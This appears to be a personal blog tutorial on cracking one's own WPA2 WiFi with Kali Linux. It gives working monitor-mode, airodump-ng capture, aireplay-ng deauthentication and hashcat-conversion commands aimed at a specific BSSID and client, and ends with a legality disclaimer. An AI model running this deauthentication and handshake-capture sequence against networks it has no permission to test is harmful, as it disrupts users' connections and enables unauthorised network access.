Ethical Hacking: WPA2 / Kali / ALFA WiFi

Why? I thought you were all about the cloud?

I’ve been in the IT industry for over 15 years in a variety of roles, from my early days in first-line support to my current role as a cloud architect and evangelist. I’ve never really had the opportunity to venture into ethical hacking throughout my career, but it’s an area that’s always appealed to me. I firmly believe that if you have any responsibility for security (we all do) then we should have a firm understanding of the mentality of an attacker. This is a record of my venture into the realm of ethical hacking, in order to create more secure architectures and solutions.

So, I decided to set up a VM on VirtualBox, and take my first steps into ethical hacking, starting with my WPA2 protected WiFi. This guide provides a simple guide from start to finish of how to get up and running with Kali and WPA2 hacking.

Step 1: Get Kali Linux

Hopefully, this saves you time and effort in getting started!

To start, grab yourself the latest copy of Kali Linux – it’s a unique “Offensive Security” distribution that comes with most of the tools you will require already installed.

Step 2: Configure and boot the VM

If you’ve opted to use Virtual Box, then plug in your WiFi adaptor and ensure that it is enabled in the USB section of the settings of the virtual machine. I use an Alfa AWUS036ACH, which is a USB 3.0 device – ensure to chose the correct USB controller for your device.

Once you’ve configured your VM, simply boot it up (if you haven’t already) and run the all important updates commands:

apt-get update && apt-get upgrade

Followed by:

apt-get dist-upgrade

Be sure to reboot your VM after these commands.

Step 3: Test your WiFi card

Once the VM is up to date, it’s time to test and start using your WiFi adaptor.

To start, run an iwconfig command, the output will show you if your WLAN adaptor is recognised. On my VM it’s the only WiFi card, so it shows as WLAN0:

Note: many guides talk about using mon0 – my card prefers wlan0, yours may too.

This shows that the WiFi card is recognised within Kali – great news. Next, let’s ensure that monitor mode is available to the card.

Step 4: Test Monitor Mode

Monitor mode allows the WiFi adaptor to listen to all broadcast traffic in the local area:

sudo ip link set wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ip link set wlan0 up

You should see that your card is in mode: monitor (as with screenshot above)

Step 5: Collect information on WiFi networks

Now for the part that feels like your starting your ethical hacking journey, scanning for nearby WiFi networks. To get started type:

For 5Ghz networks (802.11a)

airodump-ng wlan0 --band a

For 2.4Ghz networks (802.11b/g)

airodump-ng wlan0 --band bg

To scan all available network bands

airodump-ng wlan0 --band abg

Notice that the more bands that you scan, the longer the scan takes to hop through all available channels.

Step x: Change to target network channel and perform de-authorisation attack

Now it’s time to zone in on the target network, in this example, I am using my own network which is currently on channel 36.

root@kali:~# iwconfig wlan0 channel 36 
root@kali:~# airodump-ng -c 36 --bssid 38:D5:47:E2:C3:75 -w cap01.cap wlan0
root@kali:~# aireplay-ng -D -0 2 -a 38:D5:47:E2:C3:75 -c 3C:2E:FF:4A:66:13 wlan0

Step x: Convert capture file to hccapx format for hashcat

/usr/share/hashcat-utils/cap2hccapx.bin cap01.cap-01.cap asus5g.hccapx

Step X (Optional): Move hccapx file from VM to more powerful PC (with GPU)

Once I had the capture file, I wanted to brute force the password as fast as possible. Doing this in the VirtualBox PC meant that I had to rely on purely the CPU, and seeing as I have a GTX1080 sitting in the host system, it made sense to move the file to the host. The easiest way of doing this for me was to mount an NFS folder from my NAS and upload the file from the VM to that, then grab the file from my host via SMB.

In order to get NFS up and running on Kali I had to run the following commands:

sudo apt-get install nfs-common

sudo mkdir -p /mnt/nfs/kali

sudo mount myserverip:/volume1/nfs/kali /mnt/nfs/kali

I then copied the hccapx file from my working directory to the newly mounted filesystem:

cp asus5g.hccapx /mnt/nfs/kali

Disclaimer: Ethical hacking is legal – as long as you perform it on your own equipment or have prior permission from the equipment owner. I do not condone wild west wifi hacking.